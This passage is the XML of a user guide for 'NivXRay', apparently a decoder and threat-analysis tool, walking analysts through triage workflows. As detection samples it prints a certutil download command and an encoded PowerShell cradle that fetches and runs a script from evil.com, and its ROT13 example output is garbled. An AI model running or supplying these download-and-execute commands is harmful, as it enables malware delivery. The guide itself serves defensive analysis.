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172A"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>NivXRay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F766E"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>All Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CyberChef-style decoder &amp; threat analysis platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10 features  ·  9 workflows  ·  3 categories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Auto-generated 2026-07-16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task-Oriented Workflows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Real analyst workflows — start here. Each workflow chains the features below into an investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Promote a Correction to the Regression Corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Guarantee this input never silently regresses again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1 — Decode the input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Paste in the Workspace and open the Candidate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: A candidate wins — but you can see it's not the right answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — Click CORRECT THIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Enter the correct output + chain + optional notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Correction modal opens; enter the truth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Enable promote + trigger benchmark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Check both boxes on the correction modal, name the sample, and submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: `learning_events` entry created; `regression_corpus` entry created; benchmark runs immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Review the Regression Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Open /admin and scroll to Regression Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Corpus size +1; if the new sample fails, the gate BLOCKS further library promotion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correction_flow, regression_dashboard, learning_correction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Investigate an Encoded PowerShell Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Full triage of a suspicious `powershell -EncodedCommand ...` string from paste to report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1 — Paste the command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Paste the full PowerShell command (including the base64 blob) into the Workspace input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The Magic Decoder auto-detects Base64 and produces a decoded payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — Open the Candidate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click "Show Candidate Explorer"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Base64 wins with high confidence; runners-up (rot13, base58) show structured rejection reasons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Enrich the IOCs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click the 🛈 icon next to each extracted URL / IP / domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: VT/OTX/AbuseIPDB verdicts appear inline; malicious IOCs are highlighted in red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Review the MITRE mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Look at the MITRE chips (T1105 Ingress Tool Transfer, T1059.001 PowerShell, ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Techniques align with the decoded command's behaviour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 5 — Correct the decode (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click "CORRECT THIS" if the auto-verdict is wrong; promote to corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The correction lands on the investigation timeline; a benchmark run fires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correction_flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Pivot from a Single IOC to a Full Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Start from a lone URL/IP/domain and build a complete threat picture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1 — Paste the raw IOC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Drop the URL, IP, or hash into the Workspace input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Candidate Explorer classifies it and skips decoding (input is already plaintext)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — Enrich against all providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: The IOC chip auto-shows enrichment badges (or click 🛈)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: VT/OTX/AbuseIPDB verdicts appear; aggregate = MAX severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Push to TAXII (optional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: If verdict is malicious, admin can push to the configured TAXII feed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: STIX 2.1 bundle successfully posted; entry appears in the push log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="4940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taxii_push, investigation_timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Example · certutil.exe LOLBAS Dropper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The `certutil -urlcache -f &lt;url&gt; &lt;path&gt;` living-off-the-land trick — certutil.exe (a signed Microsoft binary) is abused to download a payload while evading AV. NivXRay flags the LOLBAS abuse and pivots on the URL.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`cmd.exe /c certutil.exe -urlcache -split -f https://malicious.example[.]net/beacon.exe C:\\Users\\Public\\svc.exe` into the workspace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: No decoding needed — this one is already plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — AUTO INVESTIGATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click AUTO INVESTIGATE. The engine skips decoders (nothing to decode) and jumps straight to threat analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Verdict = **Malicious**. MITRE = T1105 (Ingress Tool Transfer) + T1218 (Signed Binary Proxy Execution). LOLBAS tab lights up with `certutil.exe`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — LOLBAS tab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click LOLBAS. `certutil.exe` is listed with intent = Download, plus a link to lolbas-project.org.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Confidence = high. Rule = "certutil.exe used as URL cache downloader".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Pivot on the URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: In IOCS tab, click `malicious.example[.]net`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Domain gets enriched — VT/OTX verdicts render, WHOIS lookup fires.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083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investigation_timeline, auto_investigate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Example · Double-Encoded (ROT13 + Base64)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Adversaries sometimes chain two cheap encodings (ROT13 → Base64) to hide from single-shot decoders. NivXRay's recursive Candidate Explorer catches this by scoring every candidate at each stage.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this Base64 blob (which ROT13-decodes to a URL):</w:t>
        <w:br/>
        <w:t>cGVyZ2N4Ly9uYWlpaWkuYy1yaWZlLmJ2eS90b2NyLnpycmZzZW56rQ==</w:t>
        <w:br/>
        <w:t>Note the trailing rQ== is intentional junk — real samples often have padding weirdness.</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Magic hint reads "Base64". You paste and NivXRay's engine starts scoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — NIVXRAY DECODE (recursive)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click NIVXRAY DECODE. The engine peels Base64, then notices the result "cerg" / "irysnp"-shaped tokens are ROT13-consistent, and applies ROT13 next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: OUTPUT = pergc//naiiii.c-rifely/tocre.zrrfsenz → after ROT13 → certc//naveee.p-verse.by/toce.smmerns (a plausible URL/domain). Chain = 2 stages, Base64 then ROT13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Open the Candidate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Toggle SHOW CANDIDATE EXPLORER.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: The winning chain is `base64_decode → rot13`, but the panel shows why single-shot ROT13 and single-shot Base64 lost (low linguistic score, non-printable ratio).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Correct if the answer looks wrong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: If NivXRay picked the wrong ROT-N variant, click CORRECT THIS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Correction modal opens with the winning chain pre-populated. Save the truth and (optionally) promote to the regression corpus.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base64_decode, rot13, correction_flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Example · Encoded PowerShell Download-Cradle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The classic "Emotet-style" download-cradle — `powershell.exe -Enc &lt;UTF-16LE base64&gt;` invoking `Net.WebClient.DownloadString`. This is what NivXRay was built to decode in one click.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powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGUAdgBpAGwALgBjAG8AbQAvAGEALgBwAHMAMQAnACkA</w:t>
        <w:br/>
        <w:t>Paste it into the workspace input.</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Character count updates. Magic hint reads "Base64 (UTF-16LE)".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — One-click NIVXRAY DECODE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click NIVXRAY DECODE. The engine picks Base64 → UTF-16LE automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: OUTPUT shows `IEX(New-Object Net.WebClient).DownloadString('http://evil.com/a.ps1')`. Chain = 2 stages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Read the verdict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Look at the Threat Analysis panel top-right.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Verdict = **Malicious** · Confidence ≥ 0.9 · MITRE T1059.001 (PowerShell) + T1105 (Ingress Tool Transfer).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Enrich the URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click the 🛈 next to `evil.com` in the IOCS tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: VT / OTX / AbuseIPDB verdicts appear inline.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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Example · Hex-Encoded Shellcode Blob</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Long strings of hex-pair octets (e.g., `\\x90\\x90\\x90...`) are a common shellcode delivery format. NivXRay detects hex, decodes to raw bytes, then inspects entropy and PE/ELF signatures to classify.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Paste: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000</w:t>
        <w:br/>
        <w:t>(Truncated MZ/PE header — real samples are much longer.)</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Magic hint reads "Hex string". Byte count reflects the exact half-length of the input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 — MAGIC DECODE (deterministic-only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Click MAGIC DECODE. Fully deterministic — no LLM in the loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: OUTPUT panel shows the raw bytes. The file-signature detector adds a PE-header chip (MZ magic).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 3 — Verdict — Suspicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: Look at the verdict card.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Verdict = **Suspicious** (binary content that wasn't expected in this context). MITRE = T1027 (Obfuscated Files or Information) + T1055 (Process Injection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 4 — Copy as base64 for handoff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Action: In the OUTPUT panel, switch to Base64 view. Copy for pasting into a sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected: Base64-encoded bytes appear in a copyable pre block.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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>NivXRay UI Reference · Every Panel · Every Tab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The visual encyclopedia — every button, tab and panel in the Analyst Workspace with a labelled screenshot, what it does, when to use it, and what to look for. Bookmark this page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1 — Empty Workspace — the landing state</w:t>
      </w:r>
